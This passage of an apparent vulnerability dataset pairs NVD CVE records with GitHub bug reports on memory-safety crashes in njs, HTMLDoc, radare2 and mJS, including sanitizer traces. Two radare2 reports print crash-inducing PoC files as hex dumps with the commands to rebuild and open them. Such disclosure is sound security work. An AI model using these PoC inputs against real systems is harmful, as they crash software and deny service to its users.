in njs_error_stack_new /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:102:16 #5 0x592ad4 in njs_error_stack_attach /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:161:11 #6 0x50506e in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1007:16 #7 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11 #8 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16 #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23 #10 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #11 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #12 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #13 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #14 0x7f0a16923082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #15 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 in njs_value_own_enumerate ==8116==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV src/njs_value.c:240:21 in njs_value_own_enumerate
https://api.github.com/repos/nginx/njs/issues/524/comments
0
2022-06-01T07:39:41Z
2022-06-09T07:08:06Z
https://github.com/nginx/njs/issues/524
1,255,242,842
524
CVE-2022-34033
2022-07-18T21:15:08.083
HTMLDoc v1.9.15 was discovered to contain a heap overflow via (write_header) /htmldoc/htmldoc/html.cxx:273.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/425" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.15:*:*:*:*:*:*:*", "matchCriteriaId": "7FA48CA3-3C4E-46CA-8B5E-FDBF99FDD55F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/michaelrsweet/htmldoc/issues/425
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
AddressSanitizer: heap-buffer-overflow on (write_header) /htmldoc/htmldoc/html.cxx:273
https://api.github.com/repos/michaelrsweet/htmldoc/issues/425/comments
3
2021-05-06T02:08:38Z
2021-05-07T10:37:41Z
https://github.com/michaelrsweet/htmldoc/issues/425
877,005,444
425
CVE-2022-34035
2022-07-18T21:15:08.127
HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/426" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/michaelrsweet/htmldoc/issues/426
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, I found a heap-buffer-overflow in write_node Reporter: dramthy from Topsec Alpha Lab test platform: htmldoc Version :current OS :Ubuntu 20.04.1 LTS aarch64 kernel: 5.4.0-53-generic compiler: gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 reproduced: (htmldoc with asan build option) ./htmldoc-with-asan ./poc.html [poc.zip](https://github.com/michaelrsweet/htmldoc/files/6438680/poc.zip) `````` ================================================================= ==25373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff8680cacf at pc 0xaaaadb308c50 bp 0xffffe65857c0 sp 0xffffe65857e0 READ of size 1 at 0xffff8680cacf thread T0 #0 0xaaaadb308c4c in write_node /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 #1 0xaaaadb3095d8 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:543 #2 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #3 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #4 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #5 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546 #6 0xaaaadb30a014 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:538 #7 0xaaaadb30a014 in html_export /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:167 #8 0xaaaadb2ee52c in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1291 #9 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c) #10 0xaaaadb2ee984 (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984) 0xffff8680cacf is located 1 bytes to the left of 1-byte region [0xffff8680cad0,0xffff8680cad1) allocated by thread T0 here: #0 0xffff8befa66c in __interceptor_strdup (/lib/aarch64-linux-gnu/libasan.so.5+0x8966c) #1 0xaaaadb35e684 in htmlReadFile /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmllib.cxx:796 #2 0xaaaadb30a55c in read_file /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:2492 #3 0xaaaadb2ee1a0 in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1177 #4 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c) #5 0xaaaadb2ee984 (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 in write_node Shadow bytes around the buggy address: 0x200ff0d01900: fa fa 00 06 fa fa 00 05 fa fa 00 06 fa fa 00 06 0x200ff0d01910: fa fa 00 04 fa fa 00 05 fa fa 00 05 fa fa 00 06 0x200ff0d01920: fa fa 00 04 fa fa 00 04 fa fa 00 05 fa fa 00 07 0x200ff0d01930: fa fa 05 fa fa fa 00 00 fa fa 07 fa fa fa 06 fa 0x200ff0d01940: fa fa 00 00 fa fa 04 fa fa fa 00 01 fa fa 05 fa =>0x200ff0d01950: fa fa 02 fa fa fa 02 fa fa[fa]01 fa fa fa 02 fa 0x200ff0d01960: fa fa 00 05 fa fa 06 fa fa fa 03 fa fa fa 03 fa 0x200ff0d01970: fa fa 04 fa fa fa 00 02 fa fa 00 02 fa fa 00 02 0x200ff0d01980: fa fa 00 02 fa fa 00 02 fa fa 04 fa fa fa 04 fa 0x200ff0d01990: fa fa 03 fa fa fa 03 fa fa fa 03 fa fa fa 00 05 0x200ff0d019a0: fa fa 00 06 fa fa 00 05 fa fa 00 07 fa fa 00 07 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25373==ABORTING `````` this bug in htmldoc/htmldoc/html.cxx:588: `````` if (t->data[strlen((char *)t->data) - 1] == '\n') col = 0; `````` similar to ````` #include <string.h> #include <iostream> int main() { const char * s = ""; std::cout<<(int)(strlen((char *)s) - 1); return 0; } ````` the index out of bounds。
AddressSanitizer: heap-buffer-overflow on write_node htmldoc/htmldoc/html.cxx:588
https://api.github.com/repos/michaelrsweet/htmldoc/issues/426/comments
2
2021-05-07T02:47:11Z
2021-05-07T10:43:05Z
https://github.com/michaelrsweet/htmldoc/issues/426
878,358,961
426
CVE-2022-34502
2022-07-22T15:15:08.703
Radare2 v5.7.0 was discovered to contain a heap buffer overflow via the function consume_encoded_name_new at format/wasm/wasm.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted binary file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "C3D7A38B-5772-4F2B-AF10-7C79AF2F18FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/radareorg/radare2/issues/20336
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ```sh Mon Jun 20 03:01:00 PM CST 2022 radare2 5.7.0 28296 @ linux-x86-64 git.5.7.0 commit: 09569c1d5c324df7f23bdc9ad864ac1c25925745 build: 2022-06-20__11:48:07 Linux x86_64 ``` ## Description After 5.7.0 release, a heap buffer overflow can be found in function `consume_encoded_name_new` in `format/wasm/wasm.c` via openning a crafted binary file with r2. <!-- Explain what's the issue and what would you expect to see --> ## Test 1. Build Radare2 with AddressSanitizer enabled. (Just execute `./sys/sanitize.sh`) 2. Make a PoC file with size of just 38 bytes. Save the content below as `hex.txt` ``` 00000000: 0061 736d 7f00 0000 0001 0dff 7436 ff8b .asm........t6.. 00000010: 3000 3e01 499f 1000 fc00 7f45 4c46 80ff 0.>.I......ELF.. 00000020: fe61 73ff 0240 .as..@ ``` `xxd -r hex.txt > PoCfile` to create the poc file 3. `r2 PoCfile` ```log ==1862034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000156b8 at pc 0x7fd01225622c bp 0x7ffc007f6a20 sp 0x7ffc007f6a10 WRITE of size 1 at 0x6060000156b8 thread T0 #0 0x7fd01225622b in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:147 #1 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955 #2 0x7fd01225b053 in r_bin_wasm_init /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:872 #3 0x7fd0122501e2 in load_buffer /home/ubuntu/radare2/libr/..//libr/bin/p/bin_wasm.c:29 #4 0x7fd011e1352c in r_bin_object_new /home/ubuntu/radare2/libr/bin/bobj.c:149 #5 0x7fd011e08513 in r_bin_file_new_from_buffer /home/ubuntu/radare2/libr/bin/bfile.c:592 #6 0x7fd011dc5baa in r_bin_open_buf /home/ubuntu/radare2/libr/bin/bin.c:285 #7 0x7fd011dc6996 in r_bin_open_io /home/ubuntu/radare2/libr/bin/bin.c:345 #8 0x7fd0142a6b57 in r_core_file_do_load_for_io_plugin /home/ubuntu/radare2/libr/core/cfile.c:436 #9 0x7fd0142a96fb in r_core_bin_load /home/ubuntu/radare2/libr/core/cfile.c:637 #10 0x7fd019bb1d8f in r_main_radare2 /home/ubuntu/radare2/libr/main/radare2.c:1256 #11 0x5557ff52696e in main /home/ubuntu/radare2/binr/radare2/radare2.c:104 #12 0x7fd018faf082 in __libc_start_main ../csu/libc-start.c:308 #13 0x5557ff52630d in _start (/home/ubuntu/radare2/binr/radare2/radare2+0x230d) 0x6060000156b8 is located 2 bytes to the right of 54-byte region [0x606000015680,0x6060000156b6) allocated by thread T0 here: #0 0x7fd01ad24808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fd0122552f4 in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:133 #2 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955 ``` <!-- Steps to reproduce the issue and provide files/links/images/.. --> The vulnerable code is introduced in https://github.com/radareorg/radare2/commit/b0129d72075cc148f8d91a7d17dd76314e91d91a#diff-4d372afc1ec76c51b9f2f402ae1b543c699030475eb192b8d49ec8dd47f04b0cR132-R147
heap-buffer-overflow in WASM name handling after 5.7.0 release
https://api.github.com/repos/radareorg/radare2/issues/20336/comments
2
2022-06-20T07:52:24Z
2023-02-10T00:34:07Z
https://github.com/radareorg/radare2/issues/20336
1,276,517,429
20,336
CVE-2022-34520
2022-07-22T15:15:08.827
Radare2 v5.7.2 was discovered to contain a NULL pointer dereference via the function r_bin_file_xtr_load_buffer at bin/bfile.c. This vulnerability allows attackers to cause a Denial of Service (DOS) via a crafted binary file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/20354" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:5.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "6E68F1D1-553D-479A-8773-ABCECDD7F1BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/radareorg/radare2/issues/20354
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
## Environment ```sh Sat Jun 25 11:13:09 AM CST 2022 radare2 5.7.3 28346 @ linux-x86-64 git.5.6.6-689-gf369ff2de commit: f369ff2de3c807681ec76df450ee6d4af5e04ce0 build: 2022-06-24__10:39:32 ``` ## Description NULL pointer dereference in function `r_bin_file_xtr_load_buffer` in `bin/bfile.c` in Radare2 5.7.2 could crash the application when opening a crafted binary file with r2. Typically, attackers can leverage this vulnerability to perform denial-of-service attack in the context of the current user. ## Test 1. Build Radare2 normally or with `UBSAN` enabled 2. Make a PoC file with size of just 32 bytes. Save the content below as `hex.txt` ``` 00000000: 5841 4c5a 0000 0010 009a 454c 4680 009a XALZ......ELF... 00000010: 454c 4280 df96 0003 df7b 0003 ff5b 003e ELB......{...[.> ``` `xxd -r hex.txt > PoCfile` to create the poc file 3. `r2 PoCfile`, the program will crash immediately When built normally: ``` ERROR: LZ4 decompression failed zsh: segmentation fault (core dumped) ./install0/bin/r2 PoCfile ``` When `UBSAN` and `ASAN` enabled: ``` ERROR: LZ4 decompression failed ../libr/bin/bfile.c:817:7: runtime error: member access within null pointer of type 'RBinXtrData' (aka 'struct r_bin_xtr_data_t') SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../libr/bin/bfile.c:817:7 in AddressSanitizer:DEADLYSIGNAL ================================================================= ==3515943==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x56147ed500b0 bp 0x7ffe95e3a3a0 sp 0x7ffe95e3a0a0 T0) ==3515943==The signal is caused by a WRITE memory access. ==3515943==Hint: address points to the zero page. #0 0x56147ed500b0 in r_bin_file_xtr_load_buffer /data/Repo/radare2/build/../libr/bin/bfile.c:817:13 #1 0x56147ec16be6 in r_bin_open_buf /data/Repo/radare2/build/../libr/bin/bin.c:275:11 #2 0x56147ec1157d in r_bin_open_io /data/Repo/radare2/build/../libr/bin/bin.c:345:13 #3 0x56147c1b6a99 in r_core_file_do_load_for_io_plugin /data/Repo/radare2/build/../libr/core/cfile.c:436:7 #4 0x56147c195842 in r_core_bin_load /data/Repo/radare2/build/../libr/core/cfile.c:637:4 #5 0x561477ea9ef1 in r_main_radare2 /data/Repo/radare2/build/../libr/main/radare2.c:1258:15 ```
NULL pointer dereference in `r_bin_file_xtr_load_buffer`
https://api.github.com/repos/radareorg/radare2/issues/20354/comments
1
2022-06-25T03:31:59Z
2022-06-25T15:08:52Z
https://github.com/radareorg/radare2/issues/20354
1,284,427,588
20,354
CVE-2021-33437
2022-07-26T13:15:08.487
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/160" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/160
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen_cb-memory-leak ASAN info: ```C ==29407==ERROR: LeakSanitizer: detected memory leaks Direct leak of 37331 byte(s) in 1 object(s) allocated from: #0 0x7f151fe52602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42ffcd in frozen_cb test/mjs-uaf/build_asan/mjs.c:12025 #2 0x4092c4 in json_parse_string test/mjs-uaf/build_asan/mjs.c:5898 #3 0x40b482 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5993 #4 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #5 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #6 0x40b863 in json_parse_pair test/mjs-uaf/build_asan/mjs.c:6058 #7 0x40bc63 in json_parse_object test/mjs-uaf/build_asan/mjs.c:6070 #8 0x40b4a3 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5996 #9 0x40c135 in json_doit test/mjs-uaf/build_asan/mjs.c:6083 #10 0x40f2aa in json_walk test/mjs-uaf/build_asan/mjs.c:6466 #11 0x4309d9 in mjs_json_parse test/mjs-uaf/build_asan/mjs.c:12133 #12 0x430f11 in mjs_op_json_parse test/mjs-uaf/build_asan/mjs.c:12193 #13 0x42572a in mjs_execute test/mjs-uaf/build_asan/mjs.c:9648 #14 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #15 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #16 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #17 0x7f151f80c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s). ```
AddressSanitizer: 1 memory leaks of frozen_cb()
https://api.github.com/repos/cesanta/mjs/issues/160/comments
0
2021-05-19T08:38:25Z
2021-05-19T08:38:25Z
https://github.com/cesanta/mjs/issues/160
895,159,181
160
CVE-2021-33438
2022-07-26T13:15:08.630
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in json_parse_array() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/158
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5fb78-json_parse_array-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==29997==ERROR: AddressSanitizer: stack-overflow on address 0x7ffecd8c9eb8 (pc 0x7f833297cb79 bp 0x7ffecd8ca770 sp 0x7ffecd8c9ec0 T0) #0 0x7f833297cb78 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x5fb78) #1 0x7f833297e145 in __interceptor_vsnprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61145) #2 0x7f833297e3b1 in snprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x613b1) #3 0x40a934 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5952 #4 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #5 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #6 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #7 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #8 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #9 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #10 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #11 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #12 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #13 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #14 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #15 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #16 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #17 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #18 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #19 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #20 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #21 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #22 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #23 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #24 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #25 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #26 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #27 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #28 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #29 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #30 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #31 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #32 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #33 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #34 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #35 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #36 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #37 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #38 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #39 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #40 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #41 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #42 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #43 0x40aa25 in json_parse_array 